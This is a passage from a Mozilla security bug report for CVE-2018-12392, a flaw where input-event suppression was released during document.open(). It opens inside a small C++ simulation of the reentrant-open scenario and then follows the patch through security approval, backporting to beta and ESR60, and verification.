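        FreeInnerObjects(/*forDocumentOpen=*/fixed);
        doc = fresh;
        inOpen = false;
    }

    // Normal release of suppression once the document has settled.
    void Unsuppress() {
        if (doc->suppressCount > 0 && --doc->suppressCount == 0) {
            auto queue = std::move(doc->delayed);
            for (auto& h : queue) h(*this);
        }
    }
};

struct Outcome { int reentrantOpens; bool sawTeardown; };

// Scenario from the testcase: a focus handler (fun1) is queued while events
// are suppressed, script calls document.open() (fun0 via writeln), and the
// focus handler calls open() again.
Outcome RunScenario(bool fixed) {
    Window w;
    w.doc = std::make_shared<Document>();
    w.doc->suppressCount = 1;  // e.g. the page is still loading
    w.doc->delayed.push_back([fixed](Window& win) {  // "fun1"
        if (!win.doc->valid) win.handlerSawTeardown = true;
        win.Open(fixed);  // o707.open() from inside the focus handler
    });
    w.Open(fixed);        // "fun0": writeln -> document.open()
    w.Unsuppress();       // later: load completes, events released
    return {w.reentrantOpens, w.handlerSawTeardown};
}

int main() {
    for (bool fixed : {false, true}) {
        Outcome o = RunScenario(fixed);
        std::printf("fixed=%d reentrantOpens=%d sawTeardown=%d\n",
                    fixed, o.reentrantOpens, o.sawTeardown);
    }
    return 0;
}
```

The unfixed run reports one reentrant open and a handler that observed the torn-down document; the fixed run reports neither, because the handler only runs from Unsuppress() after doc points at the fresh document.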
Comment 11•6 years ago (Assignee)
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
The patch does pinpoint the issue, and actually, constructing at least a crash should be somewhat easy.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be something like
-m "Bug 1492823, ensure user input suppression works correctly even after document.open, r=peterv"
Which older supported branches are affected by this flaw?
all
If not all supported branches, which bug introduced the flaw?
see above. (I think this has been an issue at least since bug 946641, FF28)
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Looks like esr60 might need a separate patch, since bug 1451913 is the one which added handleDocumentOpen variable.
How likely is this patch to cause regressions; how much testing does it need?
I'd say rather unlikely to cause regressions. One needs to have document.open running inside sync xhr or so.
Attachment #9012513 -
Flags: sec-approval?
Updated•6 years ago
status-firefox62: --- → affected
status-firefox63: --- → affected
status-firefox-esr60: --- → affected
Comment 12•6 years ago
We only have two betas left. This bug will need release management approval, so we can backport to affected branches, before I can give sec-approval.
Ritu?
tracking-firefox63: --- → +
tracking-firefox64: --- → +
tracking-firefox-esr60: --- → 63+
Flags: needinfo?(rkothari)
Comment 14•6 years ago
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
sec-approval+ for trunk.
Can we get a beta and ESR60 patch made and nominated as well, to land after trunk?
Flags: needinfo?(abillings)
Attachment #9012513 -
Flags: sec-approval? → sec-approval+
Comment 15•6 years ago (Assignee)
the patch applies to beta just fine.
Comment 16•6 years ago (Assignee)
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
[Beta/Release Uplift Approval Request]
Feature/Bug causing the regression: None
User impact if declined:
Is this code covered by automated tests?: No
Has the fix been verified in Nightly?: Yes
Needs manual test from QE?: Yes
If yes, steps to reproduce: See comment 0
List of other uplifts needed: None
Risk to taking this patch: Low
Why is the change risky/not risky? (and alternatives if risky):
String changes made/needed: NA
Attachment #9012513 -
Flags: approval-mozilla-beta?
Comment 17•6 years ago (Assignee)
Hmm, I'm having trouble reproducing in esr60, but I can't see why this wouldn't happen there.
Will upload a patch.
Comment 18•6 years ago (Assignee)
same for esr60, but this needs handleDocumentOpen
from https://bug1451913.bmoattachments.org/attachment.cgi?id=8967455
Attachment #9015291 -
Flags: review?(peterv)
Comment 19•6 years ago
Comment 20•6 years ago
Group: dom-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla64
Comment 21•6 years ago
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
Approved for 63.0b14. Will also approve for ESR 60.3 once the patch gets r+.
Attachment #9012513 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
Comment 22•6 years ago
uplift
Updated•6 years ago
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Updated•6 years ago
Attachment #9015291 -
Flags: review?(peterv) → review+
Comment 23•6 years ago
Comment on attachment 9015291 [details] [diff] [review]
dont_unsupress_during_document_open_esr60.diff
Fixes a sec-high, approved for ESR 60.3.
Attachment #9015291 -
Flags: approval-mozilla-esr60+
Comment 24•6 years ago
uplift
Comment 25•6 years ago
Verified that the crash is no longer reproducible using the attached testcases on latest Nightly 64 (asan and debug), latest Beta 63 (asan and non-asan) and latest ESR from https://tools.taskcluster.net/index/gecko.v2.mozilla-esr60.latest.firefox
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Updated•6 years ago
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main63+][adv-esr60.3+]
Updated•6 years ago
Alias: CVE-2018-12392
Updated•6 years ago
Flags: sec-bounty?
Updated•6 years ago
Flags: sec-bounty? → sec-bounty+
Updated•6 years ago
Component: DOM → DOM: Core & HTML
Updated•5 years ago
Group: core-security-release
Updated•9 months ago
Keywords: reporter-external